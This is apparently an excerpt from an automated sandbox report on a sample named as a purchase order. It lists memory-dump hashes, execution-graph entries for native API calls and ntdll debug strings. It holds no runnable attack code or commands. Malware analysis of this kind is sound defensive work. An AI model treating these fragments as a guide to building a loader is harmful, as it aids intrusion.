                                                      • Opcode ID: 726800f0bc4ea1ea91691183edfbbd45803f88f51f087f9706c8b840a3d0a0a4
                                                      • Instruction ID: 95e119603b15000a28be8a37339a7133de288ff0b8f84e5166841f13a92d240d
                                                      • Opcode Fuzzy Hash: 726800f0bc4ea1ea91691183edfbbd45803f88f51f087f9706c8b840a3d0a0a4
                                                      • Instruction Fuzzy Hash: 3B01D374D042499FCB80DFA8C585AAEFFF5BF08200F1081AAE954E3281D7349B40CBA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114499997.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b3d000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16b6044f6d597decf8412a8c19de706361d337ee36a943d10e5e020781f031d7
                                                      • Instruction ID: 18d03673871a565f0b443fc959dbd483a419cfa7c434232dbae557510cb2a70c
                                                      • Opcode Fuzzy Hash: 16b6044f6d597decf8412a8c19de706361d337ee36a943d10e5e020781f031d7
                                                      • Instruction Fuzzy Hash: EBF06271405344DEE7108B16DD84B62FFE8EF91724F28C55AED485B286C779AC44CAB1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97fe4920f9114d759ce8049d14e77dcba195e6242f900661c619f9f063e8c78e
                                                      • Instruction ID: 09a8967ff3c6a58e4598032600d46afa31425253e2f4fe27779b3b8091e061c6
                                                      • Opcode Fuzzy Hash: 97fe4920f9114d759ce8049d14e77dcba195e6242f900661c619f9f063e8c78e
                                                      • Instruction Fuzzy Hash: D6F02731B241148F8B585B7DA42881A3AEA9FC826132440BAF605C7356DDB0DC018390
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b71218db840b42b00865670cee9785c13f08ca2101e3516e4171539c41284e6e
                                                      • Instruction ID: e3ea4385b76128b283a6669edcfbff2082bf5a1badca7a21186874bd21cc05f8
                                                      • Opcode Fuzzy Hash: b71218db840b42b00865670cee9785c13f08ca2101e3516e4171539c41284e6e
                                                      • Instruction Fuzzy Hash: 7BF02777B241119BCB485F7CA45CA593BE69FD826231A45B7E505C7356DD70CC028780
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Strings
                                                      • String ID: ax^
                                                      • API String ID: 0-994873808
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d4550cb6a132d481de7925d7cc7aba6a29a307125f5f28b4f98bee8e21bb7793
                                                      • Instruction ID: a85cedd81341b43d4c4b3ab865d2d9be004cc022402cd3ce5107730ebc83f794
                                                      • Opcode Fuzzy Hash: d4550cb6a132d481de7925d7cc7aba6a29a307125f5f28b4f98bee8e21bb7793
                                                      • Instruction Fuzzy Hash: FBE11C74E001598FDB14DFA9C584AAEFBF2FF88304F248659D414AB355DB70A942CFA0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c9c2a15fe0a60b86554ad188af0dee07ea984ddd2d1af9314a4400cec48a6556
                                                      • Instruction ID: 279114c8e4534c4858ac1c6cf55d4ff0d9ef779f1e72276284004ab4fc3c1b29
                                                      • Opcode Fuzzy Hash: c9c2a15fe0a60b86554ad188af0dee07ea984ddd2d1af9314a4400cec48a6556
                                                      • Instruction Fuzzy Hash: D9E11C74E042598FDB14DFA9C580AAEFBF2FF88304F248299D454AB355D770A942CFA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6a3294d8529e3fa018faaaafbcdab23622a6c316b41c2bc8a09227d1f72f98b
                                                      • Instruction ID: 3e6b7415a94b6aa19c4f5ab578687d530f4f9a6f1351362871fd15a2c90a5f9b
                                                      • Opcode Fuzzy Hash: c6a3294d8529e3fa018faaaafbcdab23622a6c316b41c2bc8a09227d1f72f98b
                                                      • Instruction Fuzzy Hash: 35D1A434A00605CFDB18EF69C998AA9B7F1BF4D705F2585A8E505EB361DB31AD40CF60
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 675d6c3ea4b5785104ae15e564a8ccb73eee4db847d60d597f5ac5ce687e4fc9
                                                      • Instruction ID: 89823d6300cadc49731f256e42f1564cf1f9913356349349a7fbd513bf8c0107
                                                      • Opcode Fuzzy Hash: 675d6c3ea4b5785104ae15e564a8ccb73eee4db847d60d597f5ac5ce687e4fc9
                                                      • Instruction Fuzzy Hash: 0ED1FA31920B5ACACB04EBA4D995A99F7B1FF95300F20D79AE5093B251FF706AC4CB41
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d808f4fd177878989cd5ecae8130d971061ef1798ccace585b67e2bba697003e
                                                      • Instruction ID: 131c82a72efecfe89c0d8c29f5ab1aa656a2ef71e7e145493c5462c3e4a37952
                                                      • Opcode Fuzzy Hash: d808f4fd177878989cd5ecae8130d971061ef1798ccace585b67e2bba697003e
                                                      • Instruction Fuzzy Hash: E7A16C36E002068FCF05DFA4C8445AEB7F6FF84314B2585BAE901EB262DB75D915CB40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30718f037701dacbace77e646f525adad84feb4ed00eb56e6b022237f965ecd3
                                                      • Instruction ID: 969c400b99f3580c5b33a555be198b1a701efea3b9a358852a9698f70b69624a
                                                      • Opcode Fuzzy Hash: 30718f037701dacbace77e646f525adad84feb4ed00eb56e6b022237f965ecd3
                                                      • Instruction Fuzzy Hash: 6AD1FB31920B5ACACB14EB64D990A99F7B1FF95300F20D79AE5093B251FF706AC4CB41
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 377036da31933e9f71acd829eefb797322b58946b6660a661bf4ccf5aa14e0cb
                                                      • Instruction ID: 962e7b4ee82b1a6c8a3145dc6f52246277a15faf1e319947fa82700f6fc5a58e
                                                      • Opcode Fuzzy Hash: 377036da31933e9f71acd829eefb797322b58946b6660a661bf4ccf5aa14e0cb
                                                      • Instruction Fuzzy Hash: 0741F231714706CFD760CB69C984A5ABBF2FF84350F04C82AE1AACB664D234E945CF41
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f813528d971198044c0bdacfdc9be98615cce270504d00abc076483eaf11eac5
                                                      • Instruction ID: 4f92f9602bcb6e435ebf11b67922932d1a2243311aaa87b112335c2d2b386ff2
                                                      • Opcode Fuzzy Hash: f813528d971198044c0bdacfdc9be98615cce270504d00abc076483eaf11eac5
                                                      • Instruction Fuzzy Hash: E441D371B14706CFD750CB69C985A5ABBF2FF84350F04C82AD0AACB664D234E945CF41

                                                      Execution Graph

                                                      Execution Coverage:1.2%
                                                      Dynamic/Decrypted Code Coverage:5%
                                                      Signature Coverage:8.5%
                                                      Total number of Nodes:141
                                                      Total number of Limit Nodes:10

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 85 417b13-417b3c call 42e253 88 417b42-417b50 call 42e773 85->88 89 417b3e-417b41 85->89 92 417b60-417b71 call 42cc13 88->92 93 417b52-417b5d call 42ea13 88->93 98 417b73-417b87 LdrLoadDll 92->98 99 417b8a-417b8d 92->99 93->92 98->99
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B85
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 592690fab9869339d2f3c55b1dab14264bbee20a9bfc6d5bf63f6ddf15c2071a
                                                      • Instruction ID: 5084c3d16cd78f6066525c9c02257e451d1bbec126aea60e2d452a5e7d2945bd
                                                      • Opcode Fuzzy Hash: 592690fab9869339d2f3c55b1dab14264bbee20a9bfc6d5bf63f6ddf15c2071a
                                                      • Instruction Fuzzy Hash: 410152B1E4410DB7DF10DAA1DC42FDEB3789B54308F004196E90897240F675EB448B95

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 110 42b683-42b6b9 call 404843 call 42c723 NtClose
                                                      APIs
                                                      • NtClose.NTDLL(?,0041674F,001F0001,?,00000000,?,?,00000104), ref: 0042B6B4
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                      • Instruction ID: 727abfe5acca37f02523496ed090aec1a3da151eb2021070b30343ae6eafb1de
                                                      • Opcode Fuzzy Hash: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                      • Instruction Fuzzy Hash: CEE0463A2002147BC620BA5AEC42F9B776CDBC5718F40442AFA08A7242C775BA148AE4

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 124 17e2b60-17e2b6c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                      • Instruction ID: 3d4a8ec41e7c5125418a31caa15521e9e0c31aded5a697a1c1e22df6d38b6ba9
                                                      • Opcode Fuzzy Hash: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                      • Instruction Fuzzy Hash: FB90026120640003460572584414617800AD7E1201B55C035E20145B0DC625CAA56226
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                      • Instruction ID: 74b6f3b3a86666f00cb9df0ec6169908ad52cb82c7ebdb690ff3d7a16a4c64a5
                                                      • Opcode Fuzzy Hash: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                      • Instruction Fuzzy Hash: BF90023120540413D611725845047074009D7D1241F95C426A1424578DD756CB66A222
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                      • Instruction ID: fc259d6c8cc1d04e0931c072ce0dc2f31e2177feab8edfe8dd191d80ce4db542
                                                      • Opcode Fuzzy Hash: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                      • Instruction Fuzzy Hash: 0690023120548802D6107258840474B4005D7D1301F59C425A5424678DC795CAA57222
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                      • Instruction ID: bc5051d7db882bb6646cb09198d71de92c57379df9630b1fc0031d5be351dbe0
                                                      • Opcode Fuzzy Hash: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                      • Instruction Fuzzy Hash: 9290023160950402D600725845147075005D7D1201F65C425A1424578DC795CB6566A3

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 004141C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: N77o9w1836$N77o9w1836
                                                      • API String ID: 1836367815-4204696664
                                                      • Opcode ID: 8ea4ead0e8cd57c9f89eace35bfd1dc7174b74ea8ef28197ce62b30bf92eeec6
                                                      • Instruction ID: dbf1be6ef26193e51bcc14fecf1d30848757df0a307f1d3da546311ca6c9474a
                                                      • Opcode Fuzzy Hash: 8ea4ead0e8cd57c9f89eace35bfd1dc7174b74ea8ef28197ce62b30bf92eeec6
                                                      • Instruction Fuzzy Hash: AC012671E4421876EB20AA919C02FDF7B7C8F81B54F00405AFA047B2C0D6FC6A028BE9

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 004141C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: N77o9w1836$N77o9w1836
                                                      • API String ID: 1836367815-4204696664
                                                      • Opcode ID: 4726a8767bcfae0c73df2ffdf9b9d8f716a96223d0d12ea76fede153f4199ba2
                                                      • Instruction ID: dbf1be6ef26193e51bcc14fecf1d30848757df0a307f1d3da546311ca6c9474a
                                                      • Opcode Fuzzy Hash: 4726a8767bcfae0c73df2ffdf9b9d8f716a96223d0d12ea76fede153f4199ba2
                                                      • Instruction Fuzzy Hash: AC012671E4421876EB20AA919C02FDF7B7C8F81B54F00405AFA047B2C0D6FC6A028BE9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 28 414129-414130 29 414171-414174 28->29 30 414132-41413a 28->30 31 41417a-4141b1 call 4047b3 call 424973 29->31 32 414175 call 417b13 29->32 37 4141d3-4141d8 31->37 38 4141b3-4141c4 PostThreadMessageW 31->38 32->31 38->37 39 4141c6-4141d0 38->39 39->37
                                                      APIs
                                                      • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 004141C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: N77o9w1836$N77o9w1836
                                                      • API String ID: 1836367815-4204696664

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 40 414125-41417f 42 414186-4141b1 call 424973 40->42 43 414181 call 4047b3 40->43 46 4141d3-4141d8 42->46 47 4141b3-4141c4 PostThreadMessageW 42->47 43->42 47->46 48 4141c6-4141d0 47->48 48->46
                                                      APIs
                                                      • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 004141C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: N77o9w1836$N77o9w1836
                                                      • API String ID: 1836367815-4204696664

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 100 42b973-42b9b4 call 404843 call 42c723 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,0041E33B,?,?,00000000,?,0041E33B,?,?,?), ref: 0042B9AF
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 105 42b9c3-42ba04 call 404843 call 42c723 RtlFreeHeap
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BF45589,00000007,00000000,00000004,00000000,004173E6,000000F4,?,?,?,?,?), ref: 0042B9FF
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 115 42ba13-42ba4c call 404843 call 42c723 ExitProcess
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,00000000,?,?,EE1174AF,?,?,EE1174AF), ref: 0042BA47
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 120 17e2c0a-17e2c0f 121 17e2c1f-17e2c26 LdrInitializeThunk 120->121 122 17e2c11-17e2c18 120->122
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2160512332
                                                      Strings
                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01815543
                                                      • Critical section address., xrefs: 01815502
                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154CE
                                                      • 8, xrefs: 018152E3
                                                      • undeleted critical section in freed memory, xrefs: 0181542B
                                                      • Address of the debug info found in the active list., xrefs: 018154AE, 018154FA
                                                      • Critical section address, xrefs: 01815425, 018154BC, 01815534
                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154E2
                                                      • Invalid debug info address of this critical section, xrefs: 018154B6
                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0181540A, 01815496, 01815519
                                                      • Thread identifier, xrefs: 0181553A
                                                      • corrupted critical section, xrefs: 018154C2
                                                      • Critical section debug info address, xrefs: 0181541F, 0181552E
                                                      • double initialized or corrupted critical section, xrefs: 01815508
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                      • API String ID: 0-2368682639
                                                      Strings
                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01812506
                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01812498
                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01812412
                                                      • @, xrefs: 0181259B
                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0181261F
                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018122E4
                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018125EB
                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01812602
                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01812624
                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018124C0
                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01812409
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                      • API String ID: 0-4009184096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                      • API String ID: 0-2515994595
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                      • API String ID: 0-1700792311
                                                      Strings
                                                      • VerifierDlls, xrefs: 01828CBD
